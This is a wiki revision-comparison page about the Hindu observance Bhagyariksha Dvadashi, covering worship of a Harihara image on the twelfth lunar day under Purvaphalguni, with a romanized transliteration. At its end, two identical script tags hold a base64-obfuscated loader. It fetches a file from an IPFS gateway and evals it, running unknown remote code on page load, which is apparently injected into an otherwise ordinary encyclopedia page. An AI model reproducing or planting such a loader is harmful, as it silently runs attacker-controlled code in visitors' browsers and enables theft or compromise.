Difference between revisions of "भाग्यऋक्ष द्वादशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (भाग्यऋक्षद्वादशी का नाम बदलकर भाग्यऋक्ष द्वादशी कर दिया गया है)
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[पूर्वाफाल्गुनी नक्षत्र]] के साथ [[द्वादशी]] पर हरिहर प्रतिमा की पूजा की जाती है।
 
*[[पूर्वाफाल्गुनी नक्षत्र]] के साथ [[द्वादशी]] पर हरिहर प्रतिमा की पूजा की जाती है।
 
*प्रतिमा एक आधा हर ([[शिव]]) एवं दूसरा आधा [[हरि]] का सूचक होता है।
 
*प्रतिमा एक आधा हर ([[शिव]]) एवं दूसरा आधा [[हरि]] का सूचक होता है।
Line 6: Line 6:
 
*पूर्वा फाल्गुनी को 'भाग्य' कहा जाता है, क्योंकि 'भग' अधिष्ठाता देवता हैं; 'ऋक्ष' का अर्थ है 'नक्षत्र'।  
 
*पूर्वा फाल्गुनी को 'भाग्य' कहा जाता है, क्योंकि 'भग' अधिष्ठाता देवता हैं; 'ऋक्ष' का अर्थ है 'नक्षत्र'।  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 10:14, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • poorvaphalguni nakshatr ke sath dvadashi par harihar pratima ki pooja ki jati hai.
  • pratima ek adha har (shiv) evan doosara adha hari ka soochak hota hai.
  • tithi dvadashi ho ya phir saptami ho aur nakshatr poorva phalguni, revati ya dhanishtha ho, phal ek hi hota hai.
  • karta ko putr, rajy adi prapt hote haian.[1]
  • poorva phalguni ko 'bhagy' kaha jata hai, kyoanki 'bhag' adhishthata devata haian; 'rriksh' ka arth hai 'nakshatr'.


tika tippani aur sandarbh

  1. krityakalpataru (vrat0 353-354); hemadri (vrat0 1, 1175-76, devipuran se uddharan);

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>